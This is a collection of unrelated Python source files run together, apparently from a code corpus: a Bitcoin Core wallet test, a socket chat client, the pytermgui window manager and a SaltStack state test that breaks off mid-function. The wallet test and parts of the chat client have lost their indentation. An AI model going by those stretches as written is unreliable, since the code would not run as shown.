assert 'w1' in self.nodes[0].listwallets()
w1.unloadwallet("w1")
assert 'w1' not in self.nodes[0].listwallets()
# Successfully unload the wallet referenced by the request endpoint
# Also ensure unload works during walletpassphrase timeout
w2.encryptwallet('test')
w2.walletpassphrase('test', 1)
w2.unloadwallet()
time.sleep(1.1)
assert 'w2' not in self.nodes[0].listwallets()
# Successfully unload all wallets
for wallet_name in self.nodes[0].listwallets():
self.nodes[0].unloadwallet(wallet_name)
assert_equal(self.nodes[0].listwallets(), [])
assert_raises_rpc_error(-18, "No wallet is loaded. Load a wallet using loadwallet or create a new one with createwallet. (Note: A default wallet is no longer automatically created)", self.nodes[0].getwalletinfo)
# Successfully load a previously unloaded wallet
self.nodes[0].loadwallet('w1')
assert_equal(self.nodes[0].listwallets(), ['w1'])
assert_equal(w1.getwalletinfo()['walletname'], 'w1')
assert_equal(sorted(map(lambda w: w['name'], self.nodes[0].listwalletdir()['wallets'])), sorted(in_wallet_dir))
# Test backing up and restoring wallets
self.log.info("Test wallet backup")
self.restart_node(0, ['-nowallet'])
for wallet_name in wallet_names:
self.nodes[0].loadwallet(wallet_name)
for wallet_name in wallet_names:
rpc = self.nodes[0].get_wallet_rpc(wallet_name)
addr = rpc.getnewaddress()
backup = os.path.join(self.options.tmpdir, 'backup.dat')
if os.path.exists(backup):
os.unlink(backup)
rpc.backupwallet(backup)
self.nodes[0].unloadwallet(wallet_name)
shutil.copyfile(empty_created_wallet if wallet_name == self.default_wallet_name else empty_wallet, wallet_file(wallet_name))
self.nodes[0].loadwallet(wallet_name)
assert_equal(rpc.getaddressinfo(addr)['ismine'], False)
self.nodes[0].unloadwallet(wallet_name)
shutil.copyfile(backup, wallet_file(wallet_name))
self.nodes[0].loadwallet(wallet_name)
assert_equal(rpc.getaddressinfo(addr)['ismine'], True)
# Test .walletlock file is closed
self.start_node(1)
wallet = os.path.join(self.options.tmpdir, 'my_wallet')
self.nodes[0].createwallet(wallet)
if self.options.descriptors:
assert_raises_rpc_error(-4, "Unable to obtain an exclusive lock", self.nodes[1].loadwallet, wallet)
else:
assert_raises_rpc_error(-4, "Error initializing wallet database environment", self.nodes[1].loadwallet, wallet)
self.nodes[0].unloadwallet(wallet)
self.nodes[1].loadwallet(wallet)
if __name__ == '__main__':
MultiWalletTest().main()
|
client.py
|
import socket
import threading
def welcome():
print("Nice to see you! Enter your nickname: ")
nickname = input()
print(f"{nickname} burst into the party")
return nickname
class Client:
def __init__(self, host: str, port: int, username: str):
self.host = host
self.port = port
self.username = username
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    def get_message(self):
        while True:
            try:
                data = self.sock.recv(1024)
                if not data:
                    # Server closed the connection; stop receiving
                    break
                print(data.decode("utf-8"))
            except OSError:
                # Socket was closed (e.g. by send_message); stop receiving
                break
    def send_message(self):
        while True:
            try:
                data = input()
                self.sock.send(f"{self.username} says: {data}".encode())
            except (EOFError, KeyboardInterrupt):
                self.sock.close()
                break
            except OSError:
                # Socket already closed; stop sending
                break
    def run(self):
        self.sock.connect((self.host, self.port))
        # The receiver runs as a daemon thread so the process can exit
        # once the sender stops.
        receiver = threading.Thread(target=self.get_message, daemon=True)
        sender = threading.Thread(target=self.send_message)
        sender.start()
        receiver.start()
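# Hedged usage sketch (not part of the original file): the host, the port and
# the use of welcome() below are illustrative assumptions only.
if __name__ == "__main__":
    nickname = welcome()
    Client("127.0.0.1", 12345, nickname).run()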
|
window_manager.py
|
"""
Description
-----------
A full implementation of a WindowManager for the terminal, building on top
of the Widget system.
It runs with no external dependencies, and has full mouse support. It is the
simplest way to use pytermgui in your applications, as it handles all input
and output in a nice and optimized manner.
It runs in two threads:
- Main thread (blocking): `WindowManager.process_input`
- WM_DisplayLoop (non-blocking): `WindowManager._start_display_thread`
Usage example
-------------
```python3
import pytermgui as ptg
with ptg.WindowManager() as manager:
manager.add(
ptg.Window()
+ "[wm-title]Hello world!"
+ ""
+ {"[wm-section]Key1": ["value1", lambda *_: manager.alert("Value1")]}
+ {"[wm-section]Key2": ["value2", lambda *_: manager.alert("Value2")]}
+ ""
+ ptg.InputField(prompt="Your input:")
+ ""
+ ["Submit!", lambda *_: manager.alert("Form submitted!")]
)
manager.run()
```
<img src=https://github.com/bczsalba/pytermgui/blob/master/assets/docs/wm_demo.gif?raw=true
style="max-width: 100%">
"""
# These objects need more than 7 attributes.
# pylint: disable=too-many-instance-attributes
from __future__ import annotations
import sys
import time
import signal
from threading import Thread
from enum import Enum, auto as _auto
from typing import Optional, Any
# https://github.com/python/mypy/issues/4930
from .widgets.layouts import Container
from .widgets import (
MarkupFormatter,
Widget,
boxes,
)
from .input import getch
from .parser import markup
from .animations import animator
from .helpers import strip_ansi, real_length
from .enums import CenteringPolicy, SizePolicy, Overflow
from .context_managers import alt_buffer, mouse_handler, MouseTranslator, cursor_at
from .ansi_interface import (
terminal,
background,
MouseEvent,
move_cursor,
MouseAction,
)
__all__ = ["Window", "WindowManager"]
class Edge(Enum):
"""Enum for window edges."""
LEFT = _auto()
TOP = _auto()
RIGHT = _auto()
BOTTOM = _auto()
class Window(Container):
"""A class representing a window.
Windows are essentially fancy `pytermgui.widgets.Container`-s. They build on top of them
to store and display various widgets, while allowing some custom functionality.
"""
is_bindable = True
overflow = Overflow.HIDE
allow_fullscreen = False
"""When a window is allowed fullscreen its manager will try to set it so before each frame."""
title = ""
"""Title shown in left-top corner."""
is_static = False
"""Static windows cannot be moved using the mouse."""
is_modal = False
"""Modal windows stay on top of every other window and block interactions with other windows."""
is_noblur = False
"""No-blur windows will always appear to stay in focus, even if they functionally don't."""
is_noresize = False
"""No-resize windows cannot be resized using the mouse."""
is_dirty = False
"""Control whether the parent manager needs to print this Window."""
min_width: int | None = None
"""Minimum width of the window.
    If set to None, _auto_min_width will be calculated based on the maximum width of inner widgets.
This is accurate enough for general use, but tends to lean to the safer side, i.e. it often
overshoots the 'real' minimum width possible.
If you find this to be the case, **AND** you can ensure that your window will not break, you
may set this value manually."""
styles = {**Container.styles, **{"title": MarkupFormatter("[wm-title]{item}")}}
chars = Container.chars.copy()
def __init__(self, *widgets: Any, **attrs: Any) -> None:
"""Initializes object.
Args:
            widgets: Widgets to add to this window after initialization.
attrs: Attributes that are passed to the constructor.
"""
self._auto_min_width = 0
super().__init__(*widgets, **attrs)
self.has_focus: bool = False
self.manager: Optional[WindowManager] = None
# ------------------------- position ----- width x height
self._restore_data: tuple[tuple[int, int], tuple[int, int]] | None = None
if self.title != "":
self.set_title(self.title)
@property
def rect(self) -> tuple[int, int, int, int]:
"""Returns the tuple of positions that define this window.
Returns:
A tuple of integers, in the order (left, top, right, bottom).
"""
left, top = self.pos
return (left, top, left + self.width, top + self.height)
@rect.setter
def rect(self, new: tuple[int, int, int, int]) -> None:
"""Sets new position, width and height of this window.
        This method also checks the minimum width this window can have; if
        the new width doesn't comply with that setting, the changes are
        thrown away.
Args:
new: A tuple of integers in the order (left, top, right, bottom).
"""
left, top, right, bottom = new
minimum = self.min_width or self._auto_min_width
if right - left < minimum:
return
# Update size policy to fill to resize inner objects properly
self.size_policy = SizePolicy.FILL
self.pos = (left, top)
self.width = right - left
self.height = bottom - top
# Restore original size policy
self.size_policy = SizePolicy.STATIC
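        # Hedged example for the setter above (numbers illustrative): with
        # min_width=None and _auto_min_width=10, assigning rect = (0, 0, 8, 5)
        # is silently ignored (8 < 10), while rect = (0, 0, 12, 5) resizes
        # the window to 12x5 at position (0, 0).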
def __iadd__(self, other: object) -> Window:
"""Calls self._add_widget(other) and returns self."""
self._add_widget(other)
return self
def __add__(self, other: object) -> Window:
"""Calls self._add_widget(other) and returns self."""
self._add_widget(other)
return self
def _add_widget(self, other: object, run_get_lines: bool = True) -> Widget:
"""Adds a widget to the window.
Args:
other: The widget-like to add.
            run_get_lines: Whether self.get_lines should be run after adding.
"""
added = super()._add_widget(other, run_get_lines)
if self.min_width is None and len(self._widgets) > 0:
self._auto_min_width = max(widget.width for widget in self._widgets)
self._auto_min_width += self.sidelength
self.height += added.height
return added
def nullify_cache(self) -> None:
"""Nullifies manager's cached blur state."""
if self.manager is not None:
self.manager.nullify_cache(self)
def contains(self, pos: tuple[int, int]) -> bool:
"""Determines whether widget contains `pos`.
This method uses window.rect to get the positions.
Args:
pos: Position to compare.
Returns:
Boolean describing whether the position is inside
this widget.
"""
left, top, right, bottom = self.rect
return left <= pos[0] < right and top <= pos[1] < bottom
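        # Hedged worked example for `contains` above (numbers illustrative):
        # a window at pos (2, 3) with width 10 and height 5 has
        # rect == (2, 3, 12, 8), so contains((2, 3)) is True while
        # contains((12, 3)) is False, as `right` and `bottom` are exclusive.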
def set_title(self, title: str, position: int = 0, pad: bool = True) -> None:
"""Sets the window's title.
Args:
title: The string to set as the window title.
position: An integer indexing into ["left", "top", "right", "bottom"],
determining where the title is applied.
pad: Whether there should be an extra space before and after the given title.
                Defaults to True.
"""
self.title = title
title = "[wm-title]" + title
if pad:
title = " " + title + " "
corners = self._get_char("corner")
assert isinstance(corners, list)
if position % 2 == 0:
corners[position] += title
else:
current = corners[position]
corners[position] = title + current
self.set_char("corner", corners)
def set_fullscreen(self, value: bool = True) -> Window:
"""Sets window to fullscreen.
Args:
value: Whether fullscreen should be set or unset.
Returns:
The same window.
"""
if value:
self._restore_data = self.pos, (self.width, self.height)
self.pos = terminal.origin
self.allow_fullscreen = True
self.size_policy = SizePolicy.FILL
else:
assert self._restore_data is not None
self.pos, (self.width, self.height) = self._restore_data
self._restore_data = None
self.allow_fullscreen = False
self.size_policy = SizePolicy.STATIC
return self
def center(
self, where: CenteringPolicy | None = None, store: bool = True
) -> Window:
"""Center window"""
super().center(where, store)
return self
def close(self) -> None:
"""Instruct window manager to close object"""
assert self.manager is not None
self.manager.close(self)
def print(self) -> None:
"""Print without flushing"""
for i, line in enumerate(self.get_lines()):
sys.stdout.write(f"\033[{self.pos[1] + i};{self.pos[0]}H" + line)
self._has_printed = True
class WindowManager(Container):
"""A class representing a WindowManager."""
is_bindable = True
framerate = 60
"""Target framerate for rendering. Higher number means more resource usage."""
focusing_actions: list[MouseAction] = [
MouseAction.LEFT_CLICK,
MouseAction.LEFT_DRAG,
MouseAction.RIGHT_CLICK,
MouseAction.RIGHT_DRAG,
]
"""A list of MouseAction-s that, when executed over a non-focused window will focus it."""
def __init__(self, **attrs: Any) -> None:
"""Initialize object."""
super().__init__(**attrs)
self._is_paused: bool = False
self._is_running: bool = True
self._should_print: bool = False
self._windows: list[Window] = []
self._drag_target: tuple[Widget, Edge | None] | None = None # type: ignore
self._drag_offsets: tuple[int, int] = (1, 1)
self._window_cache: dict[int, list[str]] = {}
self.fps: int | None = None
self.focused: Window | None = None
self.mouse_translator: MouseTranslator | None = None
# Handle some events
terminal.subscribe(terminal.RESIZE, self.on_resize)
signal.signal(signal.SIGINT, lambda *_: self.exit())
# Set global styles
markup.alias("wm-title", "210 bold")
markup.alias("wm-section", "157")
boxes.DOUBLE_TOP.set_chars_of(Window)
@staticmethod
def _sleep(duration: float) -> None:
"""Accurately sleeps some duration.
Args:
duration: The amount to sleep.
"""
# TODO: Implement a better sleep function
return time.sleep(duration)
@property
def should_print(self) -> bool:
"""Returns whether the `WindowManager` has dirty elements.
An element being "dirty" means it has changes not yet shown. Windows
can set themselves to be dirty using the `Window.is_dirty` flag."""
return (
animator.is_active
or self._should_print
or any(window.is_dirty for window in self._windows)
)
def __enter__(self) -> WindowManager:
"""Starts context manager."""
return self
def __exit__(self, _: Any, exception: Exception, __: Any) -> bool:
"""Ends context manager."""
if exception is not None:
self.stop()
raise exception
return True
def _start_display_thread(self) -> None:
"""The loop that handles all displaying
This is run as a thread, with `process_input` occupying
the main line."""
def _loop() -> None:
"""Body of thread"""
last_frame = time.perf_counter()
prev_framerate = self.framerate
fps_start_time = last_frame
frametime = 1 / self.framerate
framecount = 0
while self._is_running:
if prev_framerate != self.framerate:
frametime = 1 / self.framerate
prev_framerate = self.framerate
if self._is_paused or not self.should_print:
self._sleep(frametime)
framecount += 1
continue
elapsed = time.perf_counter() - last_frame
if elapsed < frametime:
self._sleep(frametime - elapsed)
framecount += 1
continue
animator.step()
self.print()
last_frame = time.perf_counter()
if last_frame - fps_start_time >= 1:
self.fps = framecount
fps_start_time = last_frame
framecount = 0
framecount += 1
Thread(name="WM_DisplayLoop", target=_loop).start()
def nullify_cache(self, window: Window) -> None:
"""Nullifies a window's cache.
All contained windows use caching to save on performance. Cache
gets automatically nullified if a window changes while it is
focused, but not if a window changes while unfocused.
To get the correct behavior in that instance, use `Window.nullify_cache`,
which calls this method.
Args:
            window: The window whose cache we will nullify.
"""
if id(window) in self._window_cache:
del self._window_cache[id(window)]
def execute_binding(self, key: Any) -> bool:
"""Execute bindings, including mouse ones.
Args:
key: The binding to execute, if found.
Returns:
Boolean describing success.
"""
if not isinstance(key, str):
return super().execute_binding(key)
# Execute universal mouse binding
if self.mouse_translator is None:
events = None
else:
events = self.mouse_translator(key)
if events is not None:
handled = False
for event in events:
if not isinstance(event, MouseEvent):
continue
bound = self._bindings.get(MouseEvent)
if bound is None:
continue
method, _ = bound
handled = method(self, event)
if handled:
return True
return super().execute_binding(key)
def handle_key(self, key: str) -> bool:
"""Process a keypress.
Args:
key: The key to handle.
Returns:
A boolean describing success.
"""
# Apply WindowManager bindings
if self.execute_binding(key):
return True
# Apply focused window binding, or send to InputField
if self.focused is not None:
if self.focused.execute_binding(key):
return True
if self.focused.handle_key(key):
return True
return False
def process_mouse(self, key: str) -> None:
"""Processes (potential) mouse input.
Args:
key: Input to handle.
"""
handlers = {
MouseAction.LEFT_CLICK: self._click,
MouseAction.LEFT_DRAG: self._drag,
MouseAction.RELEASE: self._release,
}
translate = self.mouse_translator
event_list = None if translate is None else translate(key)
if event_list is None:
return
for event in event_list:
# Ignore null-events
if event is None:
continue
self._should_print = True
for window in self._windows:
contains_pos = window.contains(event.position)
is_target = (
self._drag_target is not None and self._drag_target[0] is window
)
if not contains_pos and not is_target:
if window.is_modal:
break
continue
if event.action in self.focusing_actions:
self.focus(window)
if window.handle_mouse(event):
break
if event.action in handlers and handlers[event.action](
event.position, window
):
break
if not contains_pos and not window.is_modal:
continue
self.execute_binding(tuple(event))
# Break on modal window
if window.is_modal or contains_pos:
break
# Unset drag_target if no windows received the input
else:
self._drag_target = None
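        # Hedged note on the dispatch above: windows are scanned topmost-first;
        # a modal window swallows events that miss it, and the for/else arm
        # clears `_drag_target` when no window broke out of the loop.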
def focus(self, window: Window) -> None:
"""Sets a window to be focused.
Args:
window: The window to focus.
"""
if self.focused is not None:
self.focused.handle_mouse(MouseEvent(MouseAction.RELEASE, (0, 0)))
for other_window in self._windows:
other_window.has_focus = False
window.has_focus = True
# Don't crash if window was removed
        if window not in self._windows:
return
self._windows.remove(window)
self._windows.insert(0, window)
self.focused = window
def add(self, window: Window) -> WindowManager:
"""Adds a window to this manager.
Args:
window: The window to add.
Returns:
self.
"""
original_height = window.height
def _on_step(window: Widget) -> None:
"""Sets window's height on step, centers it."""
assert isinstance(window, Window)
window.height = original_height
if window.centered_axis is not None:
window.center()
self._windows.insert(0, window)
self._should_print = True
window.manager = self
# New windows take focus-precedence over already
        # existing ones, even if those are modal.
self.focus(window)
animator.animate(
window,
"width",
startpoint=int(window.width * 0.7),
endpoint=window.width,
duration=150,
step_callback=_on_step,
)
return self
def close(self, window: Window) -> None:
"""Closes a window.
Args:
window: The window to close.
"""
old_overflow = window.overflow
old_height = window.height
def _finish(window: Widget) -> None:
"""Finish closing the window after animation."""
assert isinstance(window, Window)
self._windows.remove(window)
if window.has_focus and len(self._windows) > 0:
self.focus(self._windows[0])
window.overflow = old_overflow
window.height = old_height
# NOTE: This is supposed to work using `_should_print`, but it doesn't.
# Force print
self.print()
window.overflow = Overflow.HIDE
animator.animate(
window,
"height",
endpoint=0,
duration=150,
finish_callback=_finish,
)
def on_resize(self, size: tuple[int, int]) -> None:
"""Correctly updates window positions & prints when terminal gets resized.
Args:
size: The new terminal size.
"""
width, height = size
for window in self._windows:
newx = max(0, min(window.pos[0], width - window.width))
newy = max(0, min(window.pos[1], height - window.height + 1))
window.pos = (newx, newy)
self._should_print = True
def _click(self, pos: tuple[int, int], window: Window) -> bool:
"""Process clicking a window."""
left, top, right, bottom = window.rect
if pos[1] == top and left <= pos[0] < right:
self._drag_target = (window, Edge.TOP)
elif pos[1] == bottom - 1 and left <= pos[0] < right:
self._drag_target = (window, Edge.BOTTOM)
elif pos[0] == left and top <= pos[1] < bottom:
self._drag_target = (window, Edge.LEFT)
elif pos[0] == right - 1 and top <= pos[1] < bottom:
self._drag_target = (window, Edge.RIGHT)
else:
return False
self._drag_offsets = (
pos[0] - window.pos[0],
pos[1] - window.pos[1],
)
return True
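        # Hedged worked example for `_click` above (numbers illustrative):
        # given rect (left=0, top=0, right=20, bottom=10), a click at (5, 0)
        # grabs Edge.TOP (dragging moves the window), while (19, 4) grabs
        # Edge.RIGHT (dragging resizes it).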
def _drag(self, pos: tuple[int, int], window: Window) -> bool:
"""Process dragging a window"""
def _clamp_pos(index: int) -> int:
"""Clamp a value using index to address x/y & width/height"""
offset = self._drag_offsets[index]
# TODO: This -2 is a very magical number. Not good.
maximum = terminal.size[index] - ((window.width, window.height)[index] - 2)
start_margin_index = abs(index - 1)
return max(
index + terminal.margins[start_margin_index],
min(
pos[index] - offset,
maximum - terminal.margins[start_margin_index + 2],
),
)
if self._drag_target is None:
return False
target_window, edge = self._drag_target
handled = False
if window is not target_window:
return False
left, top, right, bottom = window.rect
if not window.is_static and edge is Edge.TOP:
window.pos = (
_clamp_pos(0),
_clamp_pos(1),
)
handled = True
# TODO: Why are all these arbitrary offsets needed?
elif not window.is_noresize:
if edge is Edge.RIGHT:
window.rect = (left, top, pos[0] + 1, bottom)
handled = True
elif edge is Edge.LEFT:
window.rect = (pos[0], top, right, bottom)
handled = True
elif edge is Edge.BOTTOM:
window.rect = (left, top, right, pos[1] + 1)
handled = True
# Wipe window from cache
if id(window) in self._window_cache:
del self._window_cache[id(window)]
return handled
def _release(self, _: tuple[int, int], __: Window) -> bool:
"""Process release of key"""
self._drag_target = None
        # This returns False so the Window can handle the mouse action as well,
# as not much is done in this callback.
return False
def process_input(self) -> None:
"""Processes incoming input."""
while self._is_running:
key = getch(interrupts=False)
if key == chr(3):
self.stop()
break
if self.handle_key(key):
self._should_print = True
continue
self.process_mouse(key)
def stop(self) -> None:
"""Stops the main loop."""
self._is_running = False
def pause(self) -> None:
"""Pauses the main loop."""
self._is_paused = True
def unpause(self) -> None:
"""Pauses the main loop."""
self._is_paused = False
def exit(self) -> None:
"""Exits the program."""
self.stop()
sys.exit()
def run(self, mouse_events: list[str] | None = None) -> None:
"""Runs the main loop.
Args:
mouse_events: A list of mouse event types to listen to. See
`pytermgui.ansi_interface.report_mouse` for more information.
Defaults to `["press_hold", "hover"]`.
"""
if mouse_events is None:
mouse_events = ["press_hold", "hover"]
with alt_buffer(cursor=False, echo=False):
with mouse_handler(mouse_events, "decimal_xterm") as translate:
self.mouse_translator = translate
self._start_display_thread()
self.process_input()
def print(self) -> None:
"""Prints all windows."""
def _get_lines(window: Window) -> list[str]:
"""Get cached or live lines from a Window"""
            # This optimization matters a lot when many
            # windows are being rendered.
if id(window) in self._window_cache:
return self._window_cache[id(window)]
lines: list[str] = []
for line in window.get_lines():
lines.append(markup.parse("[239]" + strip_ansi(line)))
self._window_cache[id(window)] = lines
return lines
sys.stdout.write("\033[2J")
for window in reversed(self._windows):
# TODO: Why are these offsets needed?
if window.allow_fullscreen:
window.pos = terminal.origin
window.width = terminal.width + 1
window.height = terminal.height + 3
if window.has_focus or window.is_noblur:
window.print()
continue
lines = _get_lines(window)
for i, line in enumerate(lines):
move_cursor((window.pos[0], window.pos[1] + i))
sys.stdout.write(line)
sys.stdout.flush()
self._should_print = False
def show_targets(self) -> None:
"""Shows all windows' positions."""
def _show_positions(widget, color_base: int = 60) -> None:
"""Show positions of widget."""
if isinstance(widget, Container):
for i, subwidget in enumerate(widget):
_show_positions(subwidget, color_base + i)
return
if not widget.is_selectable:
return
with cursor_at(widget.pos) as pprint:
debug = widget.debug()
buff = background(" ", color_base, reset_color=False)
for i in range(min(widget.width, real_length(debug)) - 1):
buff += debug[i]
pprint(buff)
self.pause()
for widget in self._windows:
_show_positions(widget)
getch()
self.unpause()
self._should_print = True
def alert(self, *content: Any) -> None:
"""Create a modal window with content.
Args:
*content: The content to add to the new window.
"""
window = Window("[wm-title]Alert!", is_modal=True, width=50)
for item in content:
window += item
window += ""
window += ["Dismiss", lambda *_: window.close()]
window.select(0)
self.add(window.center())
self.focus(window)
|
test_state.py
|
# -*- coding: utf-8 -*-
# Import Python libs
from __future__ import absolute_import, print_function, unicode_literals
import logging
import os
import shutil
import sys
import tempfile
import textwrap
import threading
import time
# Import Salt Testing libs
from tests.support.case import ModuleCase
from tests.support.helpers import with_tempdir
from tests.support.unit import skipIf
from tests.support.paths import BASE_FILES, TMP, TMP_PILLAR_TREE
from tests.support.mixins import SaltReturnAssertsMixin
# Import Salt libs
import salt.utils.atomicfile
import salt.utils.files
import salt.utils.path
import salt.utils.platform
import salt.utils.stringutils
from salt.modules.virtualenv_mod import KNOWN_BINARY_NAMES
# Import 3rd-party libs
from salt.ext import six
log = logging.getLogger(__name__)
DEFAULT_ENDING = salt.utils.stringutils.to_bytes(os.linesep)
def trim_line_end(line):
'''
Remove CRLF or LF from the end of line.
'''
if line[-2:] == salt.utils.stringutils.to_bytes('\r\n'):
return line[:-2]
elif line[-1:] == salt.utils.stringutils.to_bytes('\n'):
return line[:-1]
raise Exception("Invalid line ending")
def reline(source, dest, force=False, ending=DEFAULT_ENDING):
'''
Normalize the line endings of a file.
'''
fp, tmp = tempfile.mkstemp()
os.close(fp)
with salt.utils.files.fopen(tmp, 'wb') as tmp_fd:
with salt.utils.files.fopen(source, 'rb') as fd:
lines = fd.readlines()
for line in lines:
line_noend = trim_line_end(line)
tmp_fd.write(line_noend + ending)
if os.path.exists(dest) and force:
os.remove(dest)
os.rename(tmp, dest)
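# Hedged usage sketch for reline above (paths illustrative): normalize
# 'in.txt' into 'out.txt', overwriting out.txt if it already exists:
#   reline('in.txt', 'out.txt', force=True)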
class StateModuleTest(ModuleCase, SaltReturnAssertsMixin):
'''
Validate the state module
'''
maxDiff = None
@classmethod
def setUpClass(cls):
def _reline(path, ending=DEFAULT_ENDING):
'''
Normalize the line endings of a file.
'''
with salt.utils.files.fopen(path, 'rb') as fhr:
lines = fhr.read().splitlines()
with salt.utils.atomicfile.atomic_open(path, 'wb') as fhw:
for line in lines:
fhw.write(line + ending)
destpath = os.path.join(BASE_FILES, 'testappend', 'firstif')
_reline(destpath)
destpath = os.path.join(BASE_FILES, 'testappend', 'secondif')
_reline(destpath)
def test_show_highstate(self):
'''
state.show_highstate
'''
high = self.run_function('state.show_highstate')
destpath = os.path.join(TMP, 'testfile')
self.assertTrue(isinstance(high, dict))
self.assertTrue(destpath in high)
self.assertEqual(high[destpath]['__env__'], 'base')
def test_show_lowstate(self):
'''
state.show_lowstate
'''
low = self.run_function('state.show_lowstate')
self.assertTrue(isinstance(low, list))
self.assertTrue(isinstance(low[0], dict))
def test_show_states(self):
'''
state.show_states
'''
states = self.run_function('state.show_states')
self.assertTrue(isinstance(states, list))
self.assertTrue(isinstance(states[0], six.string_types))
states = self.run_function('state.show_states', sorted=False)
self.assertTrue(isinstance(states, list))
self.assertTrue(isinstance(states[0], six.string_types))
def test_catch_recurse(self):
'''
state.show_sls used to catch a recursive ref
'''
err = self.run_function('state.sls', mods='recurse_fail')
self.assertIn('recursive', err[0])
def test_no_recurse(self):
'''
verify that a sls structure is NOT a recursive ref
'''
sls = self.run_function('state.show_sls', mods='recurse_ok')
self.assertIn('snmpd', sls)
def test_no_recurse_two(self):
'''
verify that a sls structure is NOT a recursive ref
'''
sls = self.run_function('state.show_sls', mods='recurse_ok_two')
self.assertIn('/etc/nagios/nrpe.cfg', sls)
def test_running_dictionary_consistency(self):
'''
Test the structure of the running dictionary so we don't change it
without deprecating/documenting the change
'''
running_dict_fields = [
'__id__',
'__run_num__',
'__sls__',
'changes',
'comment',
'duration',
'name',
'result',
'start_time',
]
sls = self.run_function('state.single',
fun='test.succeed_with_changes',
name='gndn')
for state, ret in sls.items():
for field in running_dict_fields:
self.assertIn(field, ret)
def test_running_dictionary_key_sls(self):
'''
Ensure the __sls__ key is either null or a string
'''
sls1 = self.run_function('state.single',
fun='test.succeed_with_changes',
name='gndn')
sls2 = self.run_function('state.sls', mods='gndn')
for state, ret in sls1.items():
self.assertTrue(isinstance(ret['__sls__'], type(None)))
for state, ret in sls2.items():
self.assertTrue(isinstance(ret['__sls__'], six.string_types))
def _remove_request_cache_file(self):
'''
remove minion state request file
'''
cache_file = os.path.join(self.get_config('minion')['cachedir'], 'req_state.p')
if os.path.exists(cache_file):
os.remove(cache_file)
def test_request(self):
'''
verify sending a state request to the minion(s)
'''
self._remove_request_cache_file()
ret = self.run_function('state.request', mods='modules.state.requested')
result = ret['cmd_|-count_root_dir_contents_|-ls -a / | wc -l_|-run']['result']
self.assertEqual(result, None)
def test_check_request(self):
'''
verify checking a state request sent to the minion(s)
'''
self._remove_request_cache_file()
self.run_function('state.request', mods='modules.state.requested')
ret = self.run_function('state.check_request')
result = ret['default']['test_run']['cmd_|-count_root_dir_contents_|-ls -a / | wc -l_|-run']['result']
self.assertEqual(result, None)
def test_clear_request(self):
'''
verify clearing a state request sent to the minion(s)
'''
self._remove_request_cache_file()
self.run_function('state.request', mods='modules.state.requested')
ret = self.run_function('state.clear_request')
self.assertTrue(ret)
def test_run_request_succeeded(self):
'''
verify running a state request sent to the minion(s)
'''
self._remove_request_cache_file()
if salt.utils.platform.is_windows():
self.run_function('state.request', mods='modules.state.requested_win')
else:
self.run_function('state.request', mods='modules.state.requested')
ret = self.run_function('state.run_request')
if salt.utils.platform.is_windows():
key = 'cmd_|-count_root_dir_contents_|-Get-ChildItem C:\\\\ | Measure-Object | %{$_.Count}_|-run'
else:
key = 'cmd_|-count_root_dir_contents_|-ls -a / | wc -l_|-run'
result = ret[key]['result']
self.assertTrue(result)
def test_run_request_failed_no_request_staged(self):
'''
verify not running a state request sent to the minion(s)
'''
self._remove_request_cache_file()
self.run_function('state.request', mods='modules.state.requested')
self.run_function('state.clear_request')
ret = self.run_function('state.run_request')
self.assertEqual(ret, {})
@with_tempdir()
def test_issue_1896_file_append_source(self, base_dir):
'''
Verify that we can append a file's contents
'''
testfile = os.path.join(base_dir, 'test.append')
ret = self.run_state('file.touch', name=testfile)
self.assertSaltTrueReturn(ret)
ret = self.run_state(
'file.append',
name=testfile,
source='salt://testappend/firstif')
self.assertSaltTrueReturn(ret)
ret = self.run_state(
'file.append',
name=testfile,
source='salt://testappend/secondif')
self.assertSaltTrueReturn(ret)
with salt.utils.files.fopen(testfile, 'r') as fp_:
testfile_contents = salt.utils.stringutils.to_unicode(fp_.read())
contents = textwrap.dedent('''\
# set variable identifying the chroot you work in (used in the prompt below)
if [ -z "$debian_chroot" ] && [ -r /etc/debian_chroot ]; then
debian_chroot=$(cat /etc/debian_chroot)
fi
# enable bash completion in interactive shells
if [ -f /etc/bash_completion ] && ! shopt -oq posix; then
. /etc/bash_completion
fi
''')
if salt.utils.platform.is_windows():
new_contents = contents.splitlines()
contents = os.linesep.join(new_contents)
contents += os.linesep
self.assertMultiLineEqual(contents, testfile_contents)
ret = self.run_state(
'file.append',
name=testfile,
source='salt://testappend/secondif')
self.assertSaltTrueReturn(ret)
ret = self.run_state(
'file.append',
name=testfile,
source='salt://testappend/firstif')
self.assertSaltTrueReturn(ret)
with salt.utils.files.fopen(testfile, 'r') as fp_:
testfile_contents = salt.utils.stringutils.to_unicode(fp_.read())
self.assertMultiLineEqual(contents, testfile_contents)
def test_issue_1876_syntax_error(self):
'''
verify that we catch the following syntax error::
/tmp/salttest/issue-1876:
file:
- managed
- source: salt://testfile
file.append:
- text: foo
'''
testfile = os.path.join(TMP, 'issue-1876')
sls = self.run_function('state.sls', mods='issue-1876')
self.assertIn(
'ID \'{0}\' in SLS \'issue-1876\' contains multiple state '
'declarations of the same type'.format(testfile),
sls
)
def test_issue_1879_too_simple_contains_check(self):
expected = textwrap.dedent('''\
# set variable identifying the chroot you work in (used in the prompt below)
if [ -z "$debian_chroot" ] && [ -r /etc/debian_chroot ]; then
debian_chroot=$(cat /etc/debian_chroot)
fi
# enable bash completion in interactive shells
if [ -f /etc/bash_completion ] && ! shopt -oq posix; then
. /etc/bash_completion
fi
''')
if salt.utils.platform.is_windows():
new_contents = expected.splitlines()
expected = os.linesep.join(new_contents)
expected += os.linesep
testfile = os.path.join(TMP, 'issue-1879')
        # Delete if existing
if os.path.isfile(testfile):
os.unlink(testfile)
# Create the file
ret = self.run_function('state.sls', mods='issue-1879', timeout=120)
self.assertSaltTrueReturn(ret)
# The first append
ret = self.run_function(
'state.sls', mods='issue-1879.step-1', timeout=120
)
self.assertSaltTrueReturn(ret)
# The second append
ret = self.run_function(
'state.sls', mods='issue-1879.step-2', timeout=120
)
self.assertSaltTrueReturn(ret)
# Does it match?
try:
with salt.utils.files.fopen(testfile, 'r') as fp_:
contents = salt.utils.stringutils.to_unicode(fp_.read())
self.assertMultiLineEqual(expected, contents)
# Make sure we don't re-append existing text
ret = self.run_function(
'state.sls', mods='issue-1879.step-1', timeout=120
)
self.assertSaltTrueReturn(ret)
ret = self.run_function(
'state.sls', mods='issue-1879.step-2', timeout=120
)
self.assertSaltTrueReturn(ret)
with salt.utils.files.fopen(testfile, 'r') as fp_:
contents = salt.utils.stringutils.to_unicode(fp_.read())
self.assertMultiLineEqual(expected, contents)
except Exception:
if os.path.exists(testfile):
